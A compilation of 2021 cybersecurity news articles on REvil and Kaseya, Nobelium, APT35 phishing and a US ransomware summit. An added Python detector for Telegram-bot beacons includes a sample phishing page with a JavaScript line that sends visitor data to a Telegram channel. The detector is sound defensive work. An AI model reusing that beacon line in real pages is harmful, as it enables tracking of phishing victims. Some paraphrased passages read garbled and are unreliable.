

A week of cybercrimes: Here’s what you need to know



The digital world’s growing exposure to cyberthreats, both opportunistic and targeted, shows how cybercrime has escalated into one of the most reported crimes, with data breaches and fraud losses expected to exceed $200 billion over the next 5 years.

Following a chain of notorious cyberattacks by cyber-criminal gangs that have breached a plethora of businesses worldwide, hackers are slowly bringing businesses and tech companies to their knees.

With the ongoing and distressing rise of cyberattacks on businesses and on consumers’ privacy, recently conducted research by Juniper Research found that businesses will cumulatively lose over $200 billion to online fraud between 2020 and 2024.

Some of this could be prevented by incorporating machine learning into fraud detection, with investment in such detection expected to reach $10 billion in 2024, a 15 percent rise over 2020. Payment fraud is nonetheless expected to grow, with losses increasing by 130 percent from 2020 to 2024.

New Trump Social media app hacked on launch day

According to Jason Miller, a senior advisor to Trump’s 2020 re-election campaign, a social media site named GETTR, which was launched on Sunday, was briefly hacked after more than 500,000 people had already registered to use the site.

In an emailed statement sent to Reuters, Miller referred to the incident as a “brief problem that was detected and sealed in a matter of minutes, and all the intruder was able to accomplish was to change a few usernames.”

The site was released after Miller urged Trump’s social media team to launch a new app, following the social media bans Trump faced after the Capitol riot of January 6. The situation was immediately rectified by the campaign’s team, preventing any further damage to the site.

REvil demands $70 million ransom to restore data

The practice of hackers demanding ransom payments to restore data held by companies has been resurfacing for a while, expanding on a wider scale by the day. In what amounts to a mass extortion attack affecting major companies worldwide, a new demand of $70 million to restore data emerged on Sunday, according to Reuters.

At this juncture, the notorious cybercrime gang that calls itself “REvil” appears to be at the center of another breach, having executed on Friday one of its most dramatic hacking operations so far. After a security firm based in New Mexico was victimized by the infamous ransomware, a massive number of businesses were infected by it on Friday.

Impacting more than 1,000 businesses, the attack was carried out by exploiting a vulnerability in the update mechanism of the IT services firm Kaseya, affecting the many companies that use its software, a platform built to support remote IT management by managed service providers (MSPs).

Attackers used this weakness to deliver a malicious payload to vulnerable servers. The delivered malware then ran multiple commands to evade detection by Microsoft Defender, instructing the Kaseya update process to run a legitimate but outdated version of the “Antimalware Service”, a component of Windows Defender.

“While our early indicators suggested that only a very small number of on premises customers were affected, we took a conservative approach in shutting down the servers to ensure we protected our more than 36,000 customers to the best ability,” Kaseya CEO Fred Voccola said in an issued statement.

SolarWinds hackers proceed with a new Microsoft breach

After Nobelium’s cyberattack on Texas-based SolarWinds’ systems and the planting of malicious code in the company’s software, the Russian hack went on to compromise a Microsoft employee’s computer and to target business customers via their billing contact details.

The hacking group used password spraying alongside brute-force methods against three undisclosed entities, gaining unauthorized access to accounts by bombarding login servers with large numbers of login guesses.

“As part of our examination into this continuous activity, we likewise discovered information-stealing malware on a machine coming from among our consumer assistance representatives with access to fundamental account details for a little number of our consumers,” Microsoft declared in a blog post.

Microsoft’s announcement came as a shock to security experts. The attack targeted specific customers, with 57 percent in the IT business, 20 percent in government entities, and the rest in nongovernmental organizations.

All in all, consumers from 36 nations were targeted and affected by the cyberattack.

Apex Legends hackers interrupt games with messages about Titanfall hacking

Despite many efforts by Respawn’s developers to prevent further attacks on their systems, most of these attempts were met with utter disappointment from the famed game’s userbase.

Titanfall players hacked Apex Legends in protest: the popular game was hit with a “save Titanfall” message directing Apex players to SaveTitanfall.com, revealing the real purpose behind the hack. The aim was to raise awareness of the hackers and DDoS attacks on Titanfall’s servers and website, network floods that make the game unplayable.

The hack, imposed on all Apex players, prevented a large portion of them from accessing any of the game’s modes, affecting primarily those who play on PC. Hackers have also devised a new algorithm that degrades players’ bullet aim, reducing the game’s effectiveness; it works by removing any level of artificial accuracy so that it goes unrecognized by Respawn’s anti-cheat system.

“We are aware of and actively investigating issues impacting @PlayApex playlist that are preventing players from getting into matches”, the gaming company said while addressing the situation on Twitter. While the team works on resolving the problem, the developer stated that these attacks do not endanger players’ personal information in any way.

Daryn is a technical writer with thorough history and experience in both academic and digital writing fields.


Supernational fronts retaliate against cybercrime group REvil



Cybercrime group REvil was infiltrated by U.S. government agencies and forced to go dark after an operation against it mounted by supernational fronts, Reuters reported.

Speculation about the group’s recent absence circulated after Recorded Future security specialist Dmitry Smilyanets took to Twitter to reveal various messages from the account of a well-known REvil operator, ‘0_neday.’

The messages, posted on the cybercriminal forum XSS and shared on the microblogging platform, described the events, alleging that someone had taken control of the group’s Tor payment portal and its data leak sites.

In the message, the account revealed that he and ‘Unknown,’ the group’s chief representative, were the only members with REvil’s domain keys. The representative’s subsequent absence led other members to presume that he was dead.

In September, REvil resumed its cybercrime activities, which led to the realization that the group’s domain was being accessed using Unknown’s decryption key.

“The server was compromised, and they were looking for me. To be precise, they deleted the path to my hidden service in the torrc file and raised their own so that I would go there. I checked on others – this was not. Good luck, everyone, I’m off,” 0_neday wrote in a message.

After REvil’s Kaseya attack, the FBI acquired a universal decryption key, enabling file recovery for those exposed to the Kaseya breach without the need to pay a ransom.

Now, with the messages surfacing on Twitter, it seems that law enforcement officials concealed the fact that they had the key for weeks while stealthily going after REvil’s staff, according to Reuters.

According to individuals familiar with the matter, law enforcement and intelligence cyber specialists managed to compromise the criminal group’s network infrastructure and take control of some of its servers.

Following Unknown’s disappearance, other group members regained control over the websites last month. In doing so, REvil unintentionally restarted some internal systems, including ones already controlled by law enforcement.

“The REvil ransomware gang restored the infrastructure from the backups under the assumption that they had not been compromised,” Oleg Skulkin, deputy head of the forensics lab at the Russian-led security company Group-IB, said in a statement.

“Ironically, the gang’s own favorite tactic of compromising the backups was turned against them,” Skulkin added.

Even though trustworthy backups are a fundamental defense against ransomware, their value lies in remaining disconnected from the main networks. Otherwise, they too will be encrypted by cybercrime groups like REvil.

One source close to the matter revealed that a foreign ally of the U.S. led the hacking mission that infiltrated REvil’s network, while an anonymous former U.S. official said the operation has not yet concluded.

VMware’s head of cybersecurity strategy, Tom Kellermann, told Reuters that the success of the federal operation stems from a tougher stance led by U.S. Deputy Attorney General Lisa Monaco, under which cyberattacks on vital government ecosystems are treated as a threat to national security, in the same category as terrorist attacks.

The Kaseya and SolarWinds ransomware attacks are the two main cases that paved the way for this harsher approach to countering such attacks, and similar future ones, and pushed the Justice Department in June to elevate investigations of cyberthreats to a much higher priority.

REvil’s attacks gave the Justice Department and other government agencies a legal basis to request support from other federal organizations, such as the U.S. intelligence community and the Department of Defense.

Both the FBI and the White House National Security Council refrained from commenting on the operation.



Google nabs phishing attacks from state-sponsored cybercrimes



In a world where everyone is exposed to infiltration of their devices, Google said Thursday that it had sent approximately 50,000 alerts to users whose accounts were targeted by state-sponsored phishing and malware campaigns.

“Countering threats from Iran” is the title the Big Tech giant gave its latest blog post, covering Google’s Threat Analysis Group’s (TAG) latest tracking of disinformation campaigns, government-backed hacking, and financially motivated abuse.

“We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts. So far in 2021, we’ve sent over 50,000 warnings, nearly a 33 percent increase from this time in 2020,” the blog post stated.

While receiving the warning does mean an account could be exposed to cyber threats, not everyone who has received it has been breached.

Google elaborated that its analysis team sends these warnings to accounts it sees as potential targets of government-sponsored phishing attempts, brute-force attacks, or malware delivery efforts originating from state-backed hacking groups.

Google’s statistics show that TAG tracks more than 270 targeted or government-backed hacker groups from more than 50 countries, meaning some accounts are targeted by more than one threat actor from around the globe.

Fending off cyberattacks from Iran

Iran’s hacking group APT35, known for targeting U.S. politicians before the 2020 presidential election, seems set on continuing its mission of infiltrating government representatives’ devices and accounts.

The report highlighted not only that the group is still actively trying to infiltrate senior government personnel, but also that it has focused on developing tricks to evade detection by security tools while deceiving targets into submitting account credentials or installing spyware on their devices.

APT35’s main specialty is account theft, which lets it spy on journalists, activists, government workers, academics, and anyone else who might interest the Iranian regime.

Wielding Telegram for threat reports

According to TAG researcher Ajax Bash, one of the attackers’ favored tactics is abusing the Telegram messaging service’s bot API, creating bots in the chat app to facilitate account theft and bank fraud.

“The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel,” Bash revealed.

Google informed Telegram of the abusive activity occurring on its app, and Telegram then identified and removed the bots.

The government-backed group uses this tactic to send device data back to the channel, giving the hackers details such as the IP address, user agent and locale of visitors to their phishing sites in real time.
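As an added example (not from the article or from Google TAG), the scanner below looks for the beacon pattern just described in saved web pages: a Telegram Bot API call to sendMessage embedded in page JavaScript. The token shape, the constructed sample pages and all function names are assumptions made for this example; any bot token found is reported with its secret redacted.

```python
"""Detect Telegram Bot API beacons embedded in saved HTML/JS pages.
Added example, not code from the article or from Google TAG."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed token shape: "<numeric bot id>:<secret>". The URL form is the
# primary indicator; a bare token literal is a weaker, secondary one, since
# some pages assemble the URL at runtime from a separate token variable.
TELEGRAM_BEACON_RE = re.compile(
    r"api\.telegram\.org/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,45})/sendMessage",
    re.IGNORECASE,
)
TOKEN_LITERAL_RE = re.compile(r"\b(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,45})\b")
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*[:=]\s*[\"']?(-?\d+|@\w+)")


@dataclass
class Finding:
    kind: str                 # "beacon_url" or "token_literal"
    token: str                # bot id kept, secret replaced by <redacted>
    chat_id: Optional[str]    # destination channel, if it appears in the page


def redact(token: str) -> str:
    """Keep only the bot id so a finding can be shared without the secret."""
    bot_id, _secret = token.split(":", 1)
    return f"{bot_id}:<redacted>"


def scan_page(html: str) -> List[Finding]:
    """Return the Telegram-beacon indicators found in one page."""
    chat = CHAT_ID_RE.search(html)
    chat_id = chat.group(1) if chat else None
    findings = [Finding("beacon_url", redact(m.group("token")), chat_id)
                for m in TELEGRAM_BEACON_RE.finditer(html)]
    if not findings:  # fall back to the weaker indicator only if no URL hit
        findings = [Finding("token_literal", redact(m.group("token")), chat_id)
                    for m in TOKEN_LITERAL_RE.finditer(html)]
    return findings


# Constructed sample of a credential-harvesting page with an on-load beacon.
SAMPLE_PHISH = """<html><body onload="beacon()"><form>...</form>
<script>
function beacon(){
  fetch("https://api.telegram.org/bot123456789:AAFakeTokenForTheExampleOnly_abcdefgh/sendMessage"
        + "?chat_id=-100987654321&text=" + encodeURIComponent(navigator.userAgent));
}
</script></body></html>"""

# Constructed benign page: an ordinary login form with no beacon.
SAMPLE_CLEAN = "<html><body><form action='/login'><input name='user'></form></body></html>"

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PHISH):
        print(finding)
    print("clean page findings:", scan_page(SAMPLE_CLEAN))
```

A hit on the beacon URL is a strong indicator on its own; a bare token literal should be corroborated with the page's other content before acting on it.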

Using spyware apps to gain access

TAG’s findings also noted that in May 2020 the company discovered that APT35 had tried to upload spyware to the Google Play Store as an app masquerading as VPN software. If installed, it could have given the attackers critical data, including call logs, text messages, contacts, location data, and more.

Once detected, Google removed the app from its store before any user installed it.

Even though the app was removed from the store, TAG observed further attempts by the group to distribute the malicious VPN app on other platforms as of July 2021.

Conference-themed phishing emails

APT35’s most notable feature is impersonating conference officials in phishing attacks. Posing as the Munich Security Conference and the Think-20 (T20) Italy conference, the attackers first send non-malicious email messages inviting users to reply. Once they receive a response, the hackers send phishing links in a follow-up email.

Typically, users who respond pass through at least one redirect before reaching a phishing domain that gives APT35 access to their email.

For this purpose, link shorteners and click trackers are used heavily, often embedded in PDF files.

Google also disrupted attempts by the group to use Google Drive, Apps Script, and Sites pages for specific campaigns, as the attackers tried to get past the tech giant’s built-in defenses.

At the government level, successful malicious attacks can cause irreversible damage. For that reason, cybersecurity firms expect intrusion rates to rise in the coming years, with the U.S. as the main target, a prospect that could be especially damaging to a country still rebuilding its infrastructure after two years of the pandemic’s crippling aftermath.



US talks global cybersecurity without a key player: Russia




Amid an epidemic of ransomware attacks, the U.S. is discussing cybersecurity strategy this week with 30 countries while leaving out one key player: Russia.

The country that, unwittingly or not, hosts many of the criminal syndicates behind ransomware attacks was not invited to a two-day meeting starting Wednesday to develop new strategies to counter the threat.

White House national security adviser Jake Sullivan called it a gathering of “like-minded” governments in agreement on the urgency of the need to protect citizens and businesses from ransomware. “No one country, no one group can solve this problem,” he said in opening remarks.

The virtual discussions will focus in part on efforts to disrupt and prosecute ransomware networks like the one that attacked a major U.S. pipeline company in May, a senior administration official said. The attack on Colonial Pipeline, which led to gas shortages along the East Coast, was attributed to a Russia-based gang of cybercriminals.

The exclusion of a country so closely tied to the global ransomware phenomenon reflects the overall poor relations between Moscow and Washington.

Despite that, the U.S. has used a “dedicated channel” to address cybersecurity with Russia, said the official, who briefed reporters on the condition of anonymity to preview this week’s meeting with around 30 countries and the European Union.

Since President Joe Biden raised the issue directly with President Vladimir Putin this summer in a summit and later phone call, there have been “candid discussions” about cybercriminals operating within Russia’s borders, the official said.

“We’ve had several, and they continue, and we share information regarding specific criminal actors within Russia, and Russia has taken initial steps,” the official said.

It is unclear what steps Putin’s government has taken. Russia does not extradite its own citizens, and FBI Deputy Director Paul Abbate told a security forum last month that he has seen “no indication that the Russian government has taken action to crack down on ransomware actors that are operating in the permissive environment that they’ve created there.”

The issue was expected to be on the agenda this week in Moscow as Undersecretary of State Victoria Nuland met for talks with Russian Deputy Foreign Minister Sergei Ryabkov.

The Biden administration took office amid a massive cyberespionage campaign known as the SolarWinds attack, which U.S. officials have linked to Russian intelligence operatives. Ransomware attacks, perpetrated generally by criminal hacker gangs rather than state-sponsored groups, have caused tens of billions of dollars in losses to businesses and institutions and become a major source of tension between the two nations.

Ransomware payments reached more than $400 million globally in 2020 and topped $81 million in the first quarter of 2021, according to the U.S. government.

Actions taken by the Biden administration include imposing sanctions on a Russia-based virtual currency brokerage that officials say helped at least eight ransomware gangs launder virtual currency and issuing security directives that require pipeline companies to improve their cyber defenses.

In addition, the State Department has announced rewards of millions of dollars for information on people who engage in state-sponsored malicious cyber activities aimed at transnational criminal networks that Sullivan said operate “across multiple countries, multiple jurisdictions to carry out their attacks.”

Most of this week’s ransomware meeting is expected to be private as participants attend sessions led by India, Australia, Britain and Germany and will focus on themes such as developing resilience to withstand ransomware attacks.

Other participants include Israel, the United Arab Emirates, Bulgaria, Estonia, France, the Dominican Republic, Mexico, New Zealand, Singapore and Kenya.
